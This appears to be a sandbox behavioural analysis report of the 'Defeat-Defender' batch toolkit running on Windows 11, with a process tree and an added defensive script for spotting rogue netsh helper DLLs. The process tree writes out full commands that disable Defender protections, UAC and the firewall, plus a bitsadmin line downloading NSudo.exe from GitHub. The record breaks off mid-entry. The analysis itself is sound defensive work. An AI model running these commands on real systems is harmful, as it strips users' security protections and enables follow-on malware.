Analysis
max time kernel: 145s
max time network: 138s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 06-08-2024 19:38
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://www.pixilart.com/draw?ref=home-page#
Resource: win11-20240802-en
General
Target: https://www.pixilart.com/draw?ref=home-page#
Malware Config
Signatures
UAC bypass 2 TTPs 2 IoCs
Sets EnableLUA to 0, which switches UAC (Admin Approval Mode) off after the next reboot. Writing this HKLM value already requires an elevated token, so in practice this disables UAC rather than bypassing it.
Processes (description | ioc | process):
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | powershell.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs
Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes. In this run the calls add an exclusion for the .bat extension and for the user's Startup folder, disable Controlled Folder Access and PUA protection, set the default action for every threat severity to 6 (Allow) and set ScanScheduleDay to 8 (Never). Tamper Protection, when on, rejects changes to some Defender settings made this way; the report records only that the processes ran, not whether Defender accepted the changes.
Processes (pid | process):
3900 | powershell.exe
1592 | powershell.exe
3816 | powershell.exe
3340 | powershell.exe
240 | powershell.exe
1920 | powershell.exe
2796 | powershell.exe
1712 | powershell.exe
1320 | powershell.exe
4648 | powershell.exe
4704 | powershell.exe
1576 | powershell.exe
1492 | powershell.exe
1576 | powershell.exe
3840 | powershell.exe
3816 | powershell.exe
4704 | powershell.exe
2444 | powershell.exe
4856 | powershell.exe
5008 | powershell.exe
Download via BitsAdmin 1 TTPs 2 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes (pid | process):
2504 | netsh.exe
3020 | netsh.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Flows (flow | ioc):
60 | camo.githubusercontent.com
61 | camo.githubusercontent.com
62 | camo.githubusercontent.com
63 | camo.githubusercontent.com
114 | raw.githubusercontent.com
1 | raw.githubusercontent.com
2 | raw.githubusercontent.com
16 | camo.githubusercontent.com
Drops file in Windows directory 4 IoCs
Processes (description | ioc | process):
File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | UserOOBEBroker.exe
File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | UserOOBEBroker.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | UserOOBEBroker.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | UserOOBEBroker.exe
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. The registry activity below is netsh enumerating its registered helper DLLs under HKLM\SOFTWARE\Microsoft\NetSh at startup, which happens on every netsh launch. Persistence through this technique needs a new value written under that key, and no write to it appears in this trace.
Processes (description | ioc | process):
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
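The check a responder actually wants for this signature is whether anything foreign is registered under HKLM\SOFTWARE\Microsoft\NetSh, since netsh reads the key every time it starts. The following is an added example, not part of the sandbox report or of the analysed toolkit: it parses the text that `reg query HKLM\SOFTWARE\Microsoft\NetSh` prints and flags helper entries that point outside System32 or are not in a stock baseline. The baseline set is illustrative rather than exhaustive, and the sample output (including the `helper` entry pointing into a Temp directory) is constructed for the example; this trace showed no such value.

```python
"""Flag non-stock netsh helper DLL registrations from `reg query` output.
Added example; the sample below is constructed, not taken from the report."""
import re

# Helper DLL filenames registered on a stock Windows install.  Illustrative
# baseline (assumption): compare against a known-good host of the same build.
BASELINE = {
    "authfwcfg.dll", "dhcpcmonitor.dll", "dot3cfg.dll", "fwcfg.dll", "hnetmon.dll",
    "ifmon.dll", "netiohlp.dll", "nettrace.dll", "nshhttp.dll", "nshipsec.dll",
    "nshwfp.dll", "p2pnetsh.dll", "peerdistsh.dll", "rasmontr.dll", "rpcnsh.dll",
    "whhelper.dll", "wlancfg.dll", "wshelper.dll", "wwancfg.dll", "wcnnetsh.dll",
}
SYSTEM32 = "c:\\windows\\system32\\"   # assumes the default %SystemRoot%

# One value line of `reg query` output: "    <name>    REG_SZ    <data>"
VALUE_RE = re.compile(r"^\s{2,}(\S+)\s+REG_SZ\s+(.+?)\s*$")


def parse_reg_query(text):
    """Return {value_name: dll} from the text `reg query` prints for the NetSh key."""
    helpers = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            helpers[m.group(1)] = m.group(2)
    return helpers


def suspicious_helpers(helpers):
    """Return (name, dll, reason) for helper registrations that do not look stock."""
    hits = []
    for name, dll in helpers.items():
        base = dll.rsplit("\\", 1)[-1].lower()
        if "\\" in dll and not dll.lower().startswith(SYSTEM32):
            hits.append((name, dll, "absolute path outside System32"))
        elif base not in BASELINE:
            hits.append((name, dll, "not in the stock helper baseline"))
    return hits


# Constructed sample: stock entries plus one injected helper in a user Temp dir.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh
    dhcpcmonitor    REG_SZ    dhcpcmonitor.dll
    ifmon    REG_SZ    ifmon.dll
    rasmontr    REG_SZ    rasmontr.dll
    wshelper    REG_SZ    wshelper.dll
    fwcfg    REG_SZ    fwcfg.dll
    helper    REG_SZ    C:\Users\Admin\AppData\Local\Temp\helper.dll
"""

if __name__ == "__main__":
    for name, dll, reason in suspicious_helpers(parse_reg_query(SAMPLE)):
        print(f"{name}: {dll} ({reason})")
```

On a live host, feed the function the output of `reg query HKLM\SOFTWARE\Microsoft\NetSh` captured from the machine; a bare filename is resolved through the DLL search order, so an entry that is not in the baseline deserves a look even without an absolute path.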
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host. The only hit here is FileCoAuth.exe, a OneDrive component, not a process spawned by the downloaded toolkit.
Processes (description | ioc | process):
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | FileCoAuth.exe
Enumerates system info in registry 2 TTPs 3 IoCs
Processes (description | ioc | process):
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Modifies registry class 3 IoCs
Processes (description | ioc | process):
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-242286936-336880687-2152680090-1000\{92E5BE16-AA14-4A17-B58D-592D8CF3604F} | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings\MuiCache | MiniSearchHost.exe
Key created | \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings | msedge.exe
NTFS ADS 1 IoCs
This is Edge's quarantine utility process writing the Mark-of-the-Web (Zone.Identifier) stream on the downloaded archive; it confirms the Defeat-Defender toolkit was fetched through the browser during the run.
Processes (description | ioc | process):
File opened for modification | C:\Users\Admin\Downloads\Defeat-Defender-V1.2.0-main.zip:Zone.Identifier | msedge.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid | process | entries):
4008 | msedge.exe | x2
4880 | msedge.exe | x2
908 | msedge.exe | x2
1600 | identity_helper.exe | x2
1052 | msedge.exe | x2
5036 | msedge.exe | x2
3900 | powershell.exe | x3
1592 | powershell.exe | x3
1548 | powershell.exe | x3
2796 | powershell.exe | x3
1576 | powershell.exe | x3
3840 | powershell.exe | x3
3816 | powershell.exe | x3
4704 | powershell.exe | x3
1712 | powershell.exe | x3
1492 | powershell.exe | x3
2444 | powershell.exe | x3
3816 | powershell.exe | x2
3340 | powershell.exe | x2
3476 | powershell.exe | x2
240 | powershell.exe | x2
1320 | powershell.exe | x2
1576 | powershell.exe | x2
4856 | powershell.exe | x2
1920 | powershell.exe | x2
4648 | powershell.exe | x2
4704 | powershell.exe | x1
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes (pid | process | entries):
4880 | msedge.exe | x11
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes (description | pid | process):
Token: SeDebugPrivilege | 3900 | powershell.exe
Token: SeDebugPrivilege | 1592 | powershell.exe
Token: SeDebugPrivilege | 1548 | powershell.exe
Token: SeDebugPrivilege | 2796 | powershell.exe
Token: SeDebugPrivilege | 1576 | powershell.exe
Token: SeDebugPrivilege | 3840 | powershell.exe
Token: SeDebugPrivilege | 3816 | powershell.exe
Token: SeDebugPrivilege | 4704 | powershell.exe
Token: SeDebugPrivilege | 1712 | powershell.exe
Token: SeDebugPrivilege | 1492 | powershell.exe
Token: SeDebugPrivilege | 2444 | powershell.exe
Token: SeDebugPrivilege | 3816 | powershell.exe
Token: SeDebugPrivilege | 3340 | powershell.exe
Token: SeDebugPrivilege | 3476 | powershell.exe
Token: SeDebugPrivilege | 240 | powershell.exe
Token: SeDebugPrivilege | 1320 | powershell.exe
Token: SeDebugPrivilege | 1576 | powershell.exe
Token: SeDebugPrivilege | 4856 | powershell.exe
Token: SeDebugPrivilege | 1920 | powershell.exe
Token: SeDebugPrivilege | 4648 | powershell.exe
Token: SeDebugPrivilege | 4704 | powershell.exe
Token: SeDebugPrivilege | 5008 | powershell.exe
Suspicious use of FindShellTrayWindow 36 IoCs
Processes (pid | process | entries):
4880 | msedge.exe | x36
Suspicious use of SendNotifyMessage 14 IoCs
Processes (pid | process | entries):
4880 | msedge.exe | x14
Suspicious use of SetWindowsHookEx 2 IoCs
Processes (pid | process):
4204 | MiniSearchHost.exe
4772 | OpenWith.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (description | pid | process | target process); 64 entries, repeated rows collapsed:
PID 4880 wrote to memory of 3684 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1412 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 4008 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 3560 | 4880 | msedge.exe | msedge.exe
All entries are the Edge browser process (4880) writing into its own child processes (crashpad handler, GPU, network and storage utility processes).
Processes
Tree depth is given in brackets; a [N] entry is a child of the nearest preceding [N-1] entry.

[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pixilart.com/draw?ref=home-page#
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4880

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe09323cb8,0x7ffe09323cc8,0x7ffe09323cd8
    PID:3684

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
    PID:1412

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
    PID:4008

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
    PID:3560

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
    PID:1864

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
    PID:4524

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID:908

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
    PID:2372

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
    PID:4704

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
    PID:4692

[2] C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID:1600

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
    PID:3280

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
    PID:2104

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3256 /prefetch:8
    PID:1264

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5916 /prefetch:8
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:1052

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
    PID:4692

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
    PID:4308

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
    PID:780

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
    PID:1172

[2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:5036
[1] C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID:1744

[1] C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID:976

[1] C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:4204

[1] C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID:4288

[1] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
    PID:3048

[1] C:\Windows\System32\oobe\UserOOBEBroker.exe
    C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
    - Drops file in Windows directory
    PID:3908

[1] C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
    - System Location Discovery: System Language Discovery
    PID:4716

[1] C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    - Suspicious use of SetWindowsHookEx
    PID:4772
[1] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\run.bat" "
    PID:1792

[1] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat" "
    PID:1808

[2] C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    PID:1828

[2] C:\Windows\system32\wscript.exe
    wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
    PID:696

[2] C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
    - Download via BitsAdmin
    PID:3100

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3900

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1592

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
    - UAC bypass
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1548

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2796

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -PUAProtection disable"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1576

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3840

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3816

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4704

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1712

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1492

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "netsh advfirewall set allprofiles state off"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2444

[3] C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2504
[1] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat" "
    PID:5064

[2] C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    PID:1576

[1] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat" "
    PID:4580

[2] C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    PID:2836

[1] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat" "
    PID:784

[2] C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    PID:3484

[2] C:\Windows\system32\wscript.exe
    wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
    PID:2060

[2] C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
    - Download via BitsAdmin
    PID:3792

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3816

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3340

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
    - UAC bypass
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3476

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:240

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -PUAProtection disable"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1320

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
    - Command and Scripting Interpreter: PowerShell
